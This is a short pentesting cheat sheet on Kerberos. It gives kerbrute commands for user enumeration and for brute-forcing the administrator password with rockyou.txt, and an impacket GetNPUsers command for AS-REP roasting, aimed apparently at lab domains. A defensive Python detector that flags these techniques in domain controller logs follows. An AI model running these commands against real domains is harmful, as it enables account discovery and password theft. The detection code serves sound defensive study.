88 - Pentesting Kerberos

kerbrute - user enumeration

LIST_1='/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt'
LIST_2='/usr/share/wordlists/seclists/Usernames/Names/names.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum --dc "$DOMAIN" -d "$DOMAIN" "$LIST_1"

kerbrute - user brute force

USER='administrator'
PASS='/usr/share/wordlists/rockyou.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute bruteuser --dc "$DOMAIN" -d "$DOMAIN" "$PASS" "$USER" -v

This attack looks for user accounts that do not require Kerberos pre-authentication.

python3 /opt/tools/impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip $IP
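
For the defender's side of the three techniques above, the following added example (not part of the original page) flags each of them in domain controller Security events 4768 and 4771. The event records, thresholds and function names are constructed assumptions, and Kerberos audit logging is assumed to be enabled on the domain controller.

```python
from collections import defaultdict

def ev(event_id, user, status, preauth, ip):
    """Build a record using Security-log field names for events 4768/4771."""
    return {"EventID": event_id, "TargetUserName": user, "Status": status,
            "PreAuthType": preauth, "IpAddress": ip}

# Constructed sample events (not captured from a real domain controller).
SAMPLE_EVENTS = [
    ev(4768, "james", "0x6", "-", "::ffff:10.10.14.7"),     # unknown principal
    ev(4768, "robin", "0x6", "-", "::ffff:10.10.14.7"),
    ev(4768, "darkstar", "0x6", "-", "::ffff:10.10.14.7"),
    ev(4768, "alcie", "0x6", "-", "::ffff:10.0.0.20"),      # single typo, benign
    ev(4771, "administrator", "0x18", "2", "::ffff:10.10.14.7"),  # bad password
    ev(4771, "administrator", "0x18", "2", "::ffff:10.10.14.7"),
    ev(4771, "Administrator", "0x18", "2", "::ffff:10.10.14.7"),
    ev(4771, "alice", "0x18", "2", "::ffff:10.0.0.21"),     # one mistyped password
    ev(4768, "svc-backup", "0x0", "0", "::ffff:10.10.14.7"),  # TGT, no pre-auth
    ev(4768, "alice", "0x0", "2", "::ffff:10.0.0.21"),      # normal logon
]

def analyze(events, enum_threshold=3, brute_threshold=3):
    """Return findings as (kind, source_ip, detail) tuples."""
    unknown = defaultdict(set)                      # ip -> nonexistent names tried
    failed = defaultdict(lambda: defaultdict(int))  # ip -> user -> bad passwords
    findings = []
    for e in events:
        src = e["IpAddress"].replace("::ffff:", "")  # strip IPv4-mapped prefix
        user = e["TargetUserName"].lower()
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            unknown[src].add(user)       # KDC_ERR_C_PRINCIPAL_UNKNOWN
        elif e["EventID"] == 4771 and e["Status"] == "0x18":
            failed[src][user] += 1       # KDC_ERR_PREAUTH_FAILED
        elif (e["EventID"], e["Status"], e["PreAuthType"]) == (4768, "0x0", "0"):
            findings.append(("tgt_without_preauth", src, user))
    for src, names in unknown.items():
        if len(names) >= enum_threshold:
            findings.append(("user_enumeration", src, len(names)))
    for src, per_user in failed.items():
        for user, count in per_user.items():
            if count >= brute_threshold:
                findings.append(("password_bruteforce", src, f"{user} x{count}"))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

In production the thresholds would be applied per time window, and any `tgt_without_preauth` hit is also a prompt to review why that account has pre-authentication disabled.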